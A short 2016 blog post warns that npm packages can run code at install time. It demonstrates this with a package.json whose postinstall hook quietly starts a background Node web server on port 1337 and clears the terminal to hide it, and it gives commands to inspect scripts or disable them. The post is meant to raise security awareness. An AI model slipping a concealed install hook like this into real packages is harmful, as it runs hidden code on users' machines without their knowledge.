Last Updated: February 25, 2016 · johannesboyne

node security: npm bad use of postinstall (don't do bad things with node)

Can an npm package you install run its own code on your computer? Yes it can! See how below, and go and support the NODE SECURITY PROJECT.

Github Repo: https://github.com/johannesboyne/dontdobadthingswithnode

Look at the following example. It is a minimal npm package.json, but with a postinstall script like this I can run whatever I want on your system, with the privileges of the user running npm install, the moment you install my package. For example: start a web server on port 1337 and hide it from you.

{
  "name": "test",
  "scripts": {
    "postinstall": "echo 'var http=require(\"http\");http.createServer(function (req, res) {res.writeHead(200, {\"Content-Type\": \"text/plain\"}); res.end(\"hi, i just started a background http server at your system. You should be patient! \");}).listen(1337);//console.log(\"Server running at http://127.0.0.1:1337/\")' | node & clear;"
  }
}

$ ps
  PID TTY           TIME CMD
  586 ttys000    0:00.55 /bin/zsh
  903 ttys001    0:00.07 /bin/zsh

$ npm install
$ 

$ ps
  PID TTY           TIME CMD
  586 ttys000    0:00.56 /bin/zsh
 1555 ttys000    0:00.05 node
  903 ttys001    0:00.07 /bin/zsh

$ curl localhost:1337
hi, i just started a background http server at your system. You should be patient! %

As you can see, I am piping a text string to node, putting the node process into the background and clearing the screen so nothing shows up in your terminal. npm runs the preinstall, install and postinstall hooks automatically, and it does so for every package in the dependency tree, not only the one you asked for, so a hook like this can hide several levels deep. If you do not trust a package, read its scripts before installing (npm view <package> scripts) or disable lifecycle scripts altogether with npm install --ignore-scripts; packages that legitimately need a hook (native add-ons built with node-gyp) then have to be built by hand. So, please be mindful and support security projects.